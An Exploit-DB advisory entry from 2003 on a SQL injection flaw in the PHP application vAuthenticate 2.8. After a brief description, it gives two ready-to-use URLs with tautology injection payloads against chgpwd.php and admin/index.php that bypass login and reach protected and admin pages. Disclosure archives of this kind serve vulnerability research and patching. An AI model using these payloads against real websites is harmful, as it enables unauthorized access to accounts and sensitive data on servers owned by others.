vAuthenticate 2.8 - Remote SQL Injection Vulnerability

2003-01-14T00:00:00
ID EDB-ID:22167
Type exploitdb
Reporter frog
Modified 2003-01-14T00:00:00

Description

vAuthenticate 2.8 Remote SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/6605/info

A vulnerability has been discovered in vAuthenticate. It has been reported that various PHP scripts used by vAuthenticate are prone to SQL injection attacks. This issue may be exploited by an unauthorized attacker to view protected web pages.

An attacker that is able to access protected web pages may gain sensitive information that may aid in launching further attacks against a target server.

http://www.example.org/chgpwd.php?USERNAME=[username]&PASSWORD='%20OR%20''='
http://www.example.org/admin/index.php?USERNAME='%20OR%20''='&PASSWORD='%20OR%201=1%20AND%20level='1